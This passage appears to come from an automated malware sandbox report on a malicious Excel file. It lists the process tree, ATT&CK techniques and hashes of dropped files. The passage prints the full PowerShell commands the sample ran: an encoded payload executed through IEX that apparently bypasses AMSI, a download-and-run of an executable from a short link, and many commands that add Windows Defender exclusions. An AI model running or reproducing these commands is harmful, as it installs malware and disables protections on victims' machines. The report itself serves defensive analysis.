system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/3uqfHTI ” , ”$ENv:teMp\99864.exe” ) ; stARt ”$ENv:tEMP\99864.exe”
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4424

C:\Users\Admin\AppData\Local\Temp\99864.exe
"C:\Users\Admin\AppData\Local\Temp\99864.exe"
3⤵
- Executes dropped EXE
PID:1920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 876
4⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1552

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
PID:2648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $FXEEWNeAIhqilyjV=@(91,100,111,117,98,108,101,93,36,111,115,118,101,114,32,61,32,91,115,116,114,105,110,103,93,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,97,106,111,114,32,43,32,39,46,39,32,43,32,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,105,110,111,114,59,105,102,32,40,36,111,115,118,101,114,32,45,103,101,32,49,48,46,48,41,32,123,101,99,104,111,32,87,105,110,100,111,119,115,49,48,59,36,86,86,75,75,61,91,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,73,110,116,101,114,111,112,83,101,114,118,105,99,101,115,46,77,97,114,115,104,97,108,93,58,58,65,108,108,111,99,72,71,108,111,98,97,108,40,40,57,48,55,54,41,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,115,121,83,116,69,109,46,110,101,116,46,119,69,66,117,116,105,108,105,84,89,93,58,58,104,84,109,76,100,69,99,111,68,101,40,39,38,35,54,53,59,38,35,49,48,57,59,38,35,49,49,53,59,38,35,49,48,53,59,39,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,99,72,97,82,93,40,57,55,41,43,91,99,104,65,114,93,40,49,48,57,41,43,91,99,104,97,114,93,40,56,54,43,50,57,41,43,91,99,104,97,82,93,40,49,48,53,41,41,83,101,115,115,105,111,110,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,36,110,117,108,108,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,115,121,83,116,69,109,46,110,101,116,46,119,69,66,117,116,105,108,105,84,89,93,58,58,104,84,109,76,100,69,99,111,68,101,40,39,38,35,54,53,59,38,35,49,48,57,59,38,35,49,49,53,59,38,35,49,48,53,59,39,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,99,72,97,82,93,40,57,55,41,43,91,99,104,65,114,93,40,49,48,57,41,43,91,99,104,97,114,93,40,56,54,43,50,57,41,43,91,99,104,97,82,93,40,49,48,53,41,41,67,111,110,116,101,120,116,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,91,73,110,116,80,116,114,93,36,86,86,75,75,41,59,125,101,108,115,101,32,123,125,59);[System.Text.Encoding]::ASCII.GetString($FXEEWNeAIhqilyjV)|IEX; (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/3uqfHTI ” , ”$ENv:teMp\99864.exe” ) ; stARt ”$ENv:tEMP\99864.exe”
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628

C:\Users\Admin\AppData\Local\Temp\99864.exe
"C:\Users\Admin\AppData\Local\Temp\99864.exe"
3⤵
PID:5344

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:5580

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force
4⤵
PID:5628

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:5712

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:5204

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force
4⤵
PID:4308

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:2144

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:6468

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force
4⤵
PID:6592

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:6732

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:6388

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force
4⤵
PID:2996

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:4536

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:6800

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force
4⤵
PID:6980

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:7232

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:8052

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force
4⤵
PID:8148

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:716

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:1044

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force
4⤵
PID:6368

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:6412

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:2200

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force
4⤵
PID:4176

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:8164

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:212

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force
4⤵
PID:3876

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:6140

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:5720

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force
4⤵
PID:4868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:7796

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 1
4⤵
PID:1188

C:\Windows\SysWOW64\timeout.exe
timeout 1
5⤵
- Delays execution with timeout.exe
PID:6576

C:\Users\Admin\AppData\Local\Temp\99864.exe
"C:\Users\Admin\AppData\Local\Temp\99864.exe"
4⤵
PID:5976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1964
4⤵
- Program crash
PID:2864

C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe
"C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:4068

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
MD5
977e648bc3e547eb366f2099b951b39d

SHA1
4e3e589bfb30fe7970ae091c0f055b3aeb219240

SHA256
021e1b6af94984b37afb17d6fe74a02a6728cecac6869c60c7078c6dba2bb035

SHA512
13ed28660aa6fc51623289b4eeefa42f371c7a81f0d02204306e60a2fc410eda4c37b7166e22a08b6590cef0fbb837ece945693d1e27d39ce4438653000cb17b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
MD5
a269213e201b4f44aec231120240f200

SHA1
0d58b1cf527ee51aa378160a5e1b0741d579d36e

SHA256
feecf2fe39b3e23ad77fd0cedfca0f8cf33fea2bdf4216b451263da8ed1b8828

SHA512
0290df61251fd1c50f33d998c4fc856cffd343ec444dfb7babb27304fde45adb1c38ac99ba38caeb0dbcb8c3caafa39e11a5374b6e681706cc00157dc5bcab40

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
ea6243fdb2bfcca2211884b0a21a0afc

SHA1
2eee5232ca6acc33c3e7de03900e890f4adf0f2f

SHA256
5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

SHA512
189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
2c59a3c90f0c16d346f8c4f4df64a6c6

SHA1
324099be473da754fe733c61e2e536e550f1d45c

SHA256
17da3cfdee18f36a8ed7f5213e0829096fffc6546555ec381e06ada83388beb0

SHA512
31d54490518b88d44ec2916a1571a21b8a9db0bfc7e680cfc492c942cf81b58c32be929acfd30e14bd0b85e131d752f3c3a695a62bc5e002f761f3c8e0f1df7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\FFFD9196-9ACC-4BC0-8A82-6EBDB663EE42
MD5
3e30faff3b1128a654c1f2b9a96f296f

SHA1
817cd95ca7a371e8bf3bc5bad19493f436de221c

SHA256
fd80e13c18c7d179eed4efbde04b0b17b4b6e8405118ffe532aaf1f94847cbc8

SHA512
4d9a1d7b3fbbd0794652b77b0531c3c4ecb7b48ede804ad5a07be8ab1f5bf0e150492a1c6a25d55cf4b45b6489f5610431a46abda7e9aea25845c8960412e6a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml
MD5
d3d5914f3a89a80966e24b1479bee09c

SHA1
829ddb5e19611a33d483e32ef0d8d22e3616782f

SHA256
82dfd6cf19c46ec4914307addb6ee767d28742e1162d7560a79dbc20e1bc21ae

SHA512
55d803c493e286b2c69df3551c191e5b4962d25bbd78339b4716b382b5171bb060e4cf38573033fdc6d3f8d195da80b5dc0e5aba865294d03d97d1ff3fa106b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db
MD5
8665de22b67e46648a5a147c1ed296ca

SHA1
b289a96fee9fa77dd8e045ae8fd161debd376f48

SHA256
b5cbae5c48721295a51896f05abd4c9566be7941cda7b8c2aecb762e6e94425f

SHA512
bb03ea9347d302abf3b6fece055cdae0ad2d7c074e8517f230a90233f628e5803928b9ba7ba79c343e58dacb3e7a6fc16b94690a5ab0c71303959654a18bb5da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db
MD5
a6064fc9ce640751e063d9af443990da

SHA1
367a3a7d57bfb3e9a6ec356dfc411a5f14dfde2a

SHA256
5f72c11fd2fa88d8b8bfae1214551f8d5ee07b8895df824fa717ebbcec118a6c

SHA512
0e42dd8e341e2334eda1e19e1a344475ed3a0539a21c70ba2247f480c706ab8e2ff6dbeb790614cbde9fb547699b24e69c85c54e99ed77a08fe7e1d1b4b488d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
f6637fc3586b2fc6377311fbaece6446

SHA1
f75a7fa8e9c5f023708ca0ed3bf837526a6573d0

SHA256
c9fb720a30fc92f095f7f00a139913df6680eee4b4a7e890bbf0a6a4d02aeaf9

SHA512
2560054f171f11e78a03acc84902c0072a7904527fea81359195dd8014d54ceae84a37b503017f49665e0c6e8141e7909db21df5d11f3e4564ccbedb1fc3ab07

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
f6637fc3586b2fc6377311fbaece6446

SHA1
f75a7fa8e9c5f023708ca0ed3bf837526a6573d0

SHA256
c9fb720a30fc92f095f7f00a139913df6680eee4b4a7e890bbf0a6a4d02aeaf9

SHA512
2560054f171f11e78a03acc84902c0072a7904527fea81359195dd8014d54ceae84a37b503017f49665e0c6e8141e7909db21df5d11f3e4564ccbedb1fc3ab07

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
f6637fc3586b2fc6377311fbaece6446

SHA1
f75a7fa8e9c5f023708ca0ed3bf837526a6573d0

SHA256
c9fb720a30fc92f095f7f00a139913df6680eee4b4a7e890bbf0a6a4d02aeaf9

SHA512
2560054f171f11e78a03acc84902c0072a7904527fea81359195dd8014d54ceae84a37b503017f49665e0c6e8141e7909db21df5d11f3e4564ccbedb1fc3ab07

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
689b2b93bafb688556ea91e85d0083a7

SHA1
69288a8abf423a4f79116ca4052fe2ee9b4fe814

SHA256
f8e396eac90ce9082391e7c3ce0213f3c822a0ddae5cce72a77d35f23f67d38a

SHA512
8bbc3ea434169df0ebd576995668bc81d70a7555930593f47db03d654ca9f9b9c26a7e6420b1197bcfdb9068bff55384eb57dd71876725ec7c5d150dadcae091

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
689b2b93bafb688556ea91e85d0083a7

SHA1
69288a8abf423a4f79116ca4052fe2ee9b4fe814

SHA256
f8e396eac90ce9082391e7c3ce0213f3c822a0ddae5cce72a77d35f23f67d38a

SHA512
8bbc3ea434169df0ebd576995668bc81d70a7555930593f47db03d654ca9f9b9c26a7e6420b1197bcfdb9068bff55384eb57dd71876725ec7c5d150dadcae091

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
909afc64b92d3bb90b08fdf4e5213314

SHA1
70c43e2eb4e12c4ba3483e15b5ef2293a757a041

SHA256
ac440e4580d44a6e6ecf41124fbbba1017a63c6e71b8d239c536c3899a761093

SHA512
fd04d9ad978b27a5c8f1728b36b7417f02e005e4e788d137c95b2ee90505d3da620eaedffd6f5a4c155538275c3a4e274fdcf0c29bca38414b70f01eb7740a82

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
bef2fc66a450203b85980868224b8ee2

SHA1
9a53dd7bad45ad77d81a2b522890481e582778b7

SHA256
2a7ff588eb8eb409bee667482ae343a5f77bf29dd2bc9edce3c7c1abe20d5170

SHA512
28c2b018a67dc41270824ae28675254100b444f7ed4a89dd3583885069040282315fca2179771b1a0e263d4c830ea9233096c676cd9d79e9e10807d0cdef4c9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
fbb8f89b428393287ff4a30424a0b6dd

SHA1
22ce47d0d3b9990e2de45dab63536954d12abc18

SHA256
5dc2950743d5773246c189ac2318b714d91fdfd899e9e2bc8b7f472e2c84838f

SHA512
cc707a1b5cf24b07bbe92572658f97b0490b2e1d082109806d11b61bc359e3ad0ef9de536a9e62f9ae1240e8f26f0320d96dabfcc14f2fd3923740007e83f2ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
5c1123ebf2e1d4476811501b11e7753b

SHA1
65ae4424c0659fc0e0ccb3f09e155fe7c659cdb5

SHA256
88f6b5fab3aa00f0cb1806a23d934e93aea28fa8bce85631eb79c3f96dc21254

SHA512
198421eece0b9563ee1335993c37d2524b9bffe365fc0e440ffd89aa472a164607f18733859b2f0aaa25dc1c69ad5209976cf740e29c5160cea0fc467ef03c57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
974fbb17c8e8d961669ed80b008deda6

SHA1
b382aa6b4dc85452cc7d26df17538b9a69be7550

SHA256
b4481d77a9e43fb3a66ae793ccf3602951b2c1c5338a8d11234b5d3775801d9d

SHA512
7d397b4d1976eb4704a0bfd3868806abc7eadfa903096127464b0e83c889601ec6cc8a07edbb3325aaade08b196858293355fb78b538a5b6590b34cafdd67dbf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
cff2da26102638bed3626bc1d377a3de

SHA1
f761d202d87bea72b9d3e2be4c2146710f49fb0c

SHA256
bdb504c1197efba27342ce65813ba05b26c385605757b882e46a1863ad09edfc

SHA512
27b3591046d887262afebd5f87513b72a954c0e3abdb6a93cd417ba5ad8bf6ea8b215b1a657a6159248d88e14d6ab226096835b11f2b607f0a4387550bcdc568

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
16fedbf4f710749bf5f16c57affe8377

SHA1
8200f6b25f42c2f980ad291fbef7fb08f3992bbd

SHA256
1ea9cc4070ce7f021a8fbf925c21e3a026677a529f957f757cfc023da0c93d0b

SHA512
811f7a15919e215e9c4f831ab636586ccb93fc614c8091ef8f54244374431fe5174765d5fc4d9a217c497b11d0d347e87552bce3fb0faa27d6f0471da23b686d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
4896b10278df2e1593eba9b0d7fb51e3

SHA1
4d756b7c8c7943bd5bcbf576d59fa06f21482042

SHA256
22731862438bcfb05189e7151adce97437c8b81b7b6756bc26c4c4e40c92c816

SHA512
8e0fab96cef34c5f6c8293ae779fb78351b24468af726a0beaf1d6bd20e6670971f428e06d651b1e6ca3743937aebc1067474100b1bf46aa3c245a68fc61af00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
97386c17bf8c2be3fc4977061c2ddd7e

SHA1
eb550549b002d423dbea8f55a0e95f3323842672

SHA256
4d4a0f766657387d80086268427327ed2ab08ad4200bb680ae827431c79365d9

SHA512
0d7a3f1b6a5698d99f739cc62e08db7e577a3be27df88e6e022457c1d31be919f4d5563f19d4ce6287535015bc75a9da2ed0c6a819dd06a07a8d6384720fe868

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
0f2c54b759a355db9315c1931443990c

SHA1
6030706bf7243d6c130d222aba027f40ed7b4550

SHA256
874dc3a7a694d3a63828c4a77615533c6f216b82f6420838eb241af53e7f9efb

SHA512
6ea92c403ac71f3e6a6fd9392456bdbb80306dfc63118e3a94f30ffea201260b96590a37e738136f99555cb22b0940f9746abe3652a1539adb510e7192c2ebdc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
8d58d993e414e953608dd2c5116bf66f

SHA1
bb1591d2f0a580da8158ef3aecbd7bafc5bb0bf1

SHA256
4d29b998c27335310243e387f72112ab7590ac702b672976743373faf9dc52c2

SHA512
ce4a275eaa84c0772ee370453a917fbd4b8b7b5caf5571d0af4d3c400d8a9a83327be9a35d14bc31e0fa7274d72254fe9f968a2eaf328311169710643cd5f88f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
219db20e7efde52ca30105d1616fbb16

SHA1
